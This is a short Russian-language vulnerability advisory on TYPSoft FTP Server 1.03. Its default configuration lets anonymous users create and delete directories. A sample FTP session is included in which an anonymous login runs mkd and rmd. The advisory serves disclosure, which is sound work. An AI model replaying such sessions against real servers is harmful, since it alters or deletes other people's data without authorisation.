Уязвимость конфигурации обнаружена в TYPSoft FTP Server. Удаленный авторизованный пользователь, включая анонимного пользователя, может создавать и удалять директории на FTP сервере. 

DWC Gr0up сообщилf, что по умолчанию удаленный авторизованный пользователь может вызвать команды
mkd и rmd для создания и удаления директорий в пределах FTP сервера. Пример: 

220 TYPSoft FTP Server 1.03 ready…
user anonymous
331 Password required for anonymous.
pass anonymoys@127.0.0.1
230 User anonymous logged in.
pwd
257 "/C:/TEMP/" is current directory.
mkd subj
257 ‘/C:/TEMP/subj’: directory created.
rmd subj
250 ‘/C:/TEMP/subj’: directory removed.

Уязвимость обнаружена в TYPSoft FTP Server 1.03.



Оставить мнение